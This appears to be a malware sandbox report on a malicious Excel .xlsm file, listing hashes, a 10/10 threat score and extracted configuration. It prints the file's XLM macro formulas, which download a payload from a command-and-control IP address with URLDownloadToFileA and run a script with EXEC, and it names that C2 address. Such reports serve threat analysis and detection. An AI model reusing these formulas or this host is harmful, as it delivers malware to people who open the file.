Overview

overview

10

Static

static

10

821bf4028c...6.xlsm

windows7-x64

10

821bf4028c...6.xlsm

windows10-2004-x64

1

Sharing

Copy URL Twitter E-mail

General

  • Target

    821bf4028c0e7e17d232bbcce960f776

  • Size

    6KB

  • MD5

    821bf4028c0e7e17d232bbcce960f776

  • SHA1

    12e7074042d355bda8f4c1e9c9cd8d7ed3dd97df

  • SHA256

    c8395e8c9eefaf6fa50b8d65e3cad4fc9b4cdf156354bdbb03d8f1160ccc8405

  • SHA512

    23870e9a1cae0408ca8bd3ff10f3bd2b1603833fc100706e447b296f86b08958b3584aa94cbf3b2f6f1f5e0c2f425b1ef7883187fbb2107fb61d28a416fef5e8

  • SSDEEP

    192:NDShuSrbrA2OmmfRC8UhHFBFYuMb98yuNmYuPn8k+s0QUl+B:NWuwM2wA1FYxb98yuNmYuPn8O0QUl+B

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 821bf4028c0e7e17d232bbcce960f776
    .xlsm office2007